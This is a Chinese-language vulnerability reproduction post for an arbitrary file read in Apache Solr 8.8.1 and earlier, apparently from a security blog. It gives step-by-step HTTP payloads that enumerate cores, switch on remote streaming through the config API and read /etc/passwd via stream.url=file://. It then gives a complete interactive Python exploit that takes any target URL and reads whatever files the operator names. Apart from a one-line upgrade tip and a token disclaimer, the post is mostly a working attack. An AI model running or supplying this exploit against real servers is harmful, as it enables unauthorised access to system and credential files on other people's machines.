1、介绍
Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。
2、漏洞影响
solr <= 8.8.1版本 任意文件读取!现在最新版本8.9.0 地址:http://archive.apache.org/dist/lucene/solr/
3.漏洞复现
我这里简答搭建一下solr环境:jdk与solr 8.8.1
搭建完后点击Core Admin创建一个核心管理员test、
可能会报错没有配置文件(百度一下就解决啦)
获取core的信息:主要是name信息
payload:http://xxx.xxx.xxx.xxx:8983/solr/admin/cores?indexInfo=false&wt=json
判断是否存在漏洞
payload:
http://xxx.xxx.xxx.xxx:8983//solr/tesla/config
POST提交:
{"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
说明存在漏洞
最后利用漏洞
这里我读取文件/etc/passwd
payload:
http://xxx.xxx.xxx.xxx:8983/solr/tesla/debug/dump?param=ContentStreams
POST: stream.url=file:///etc/passwd
完美复现!
防御就更新版本 > 8.8.1
免责声明:本站提供安全工具、程序(方法)可能带有公鸡性,仅供安全研究与教学之用,风险自负!
Python POC:
import requests
import sys
import random
import re
import base64
import time
from lxml import etree
import json
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def POC_1(target_url):
core_url = target_url + "/solr/admin/cores?indexInfo=false&wt=json"
try:
response = requests.request("GET", url=core_url, timeout=10)
core_name = list(json.loads(response.text)["status"])[0]
print("\033[32m[o] 成功获得core_name,Url为:" + target_url + "/solr/" + core_name + "/config\033[0m")
return core_name
except:
print("\033[31m[x] 目标Url漏洞利用失败\033[0m")
# sys.exit(0)
def POC_2(target_url, core_name):
vuln_url = target_url + "/solr/" + core_name + "/config"
headers = {
"Content-type":"application/json"
}
data = '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}'
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)
print("\033[36m[o] 正在准备文件读取...... \033[0m".format(target_url))
if "This" in response.text and response.status_code == 200:
print("\033[32m[o] 目标 {} 可能存在漏洞 \033[0m".format(target_url))
else:
print("\033[31m[x] 目标 {} 不存在漏洞\033[0m".format(target_url))
sys.exit(0)
except Exception as e:
print("\033[31m[x] 请求失败 \033[0m", e)
def POC_3(target_url, core_name, File_name):
vuln_url = target_url + "/solr/{}/debug/dump?param=ContentStreams".format(core_name)
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = 'stream.url=file://{}'.format(File_name)
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)
if "No such file or directory" in response.text:
print("\033[31m[x] 读取{}失败 \033[0m".format(File_name))
else:
print("\033[36m[o] 响应为:\n{} \033[0m".format(json.loads(response.text)["streams"][0]["stream"]))
except Exception as e:
print("\033[31m[x] 请求失败 \033[0m", e)
if __name__ == '__main__':
title()
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
core_name = POC_1(target_url)
POC_2(target_url, core_name)
while True:
File_name = str(input("\033[35mFile >>> \033[0m"))
POC_3(target_url, core_name, File_name)
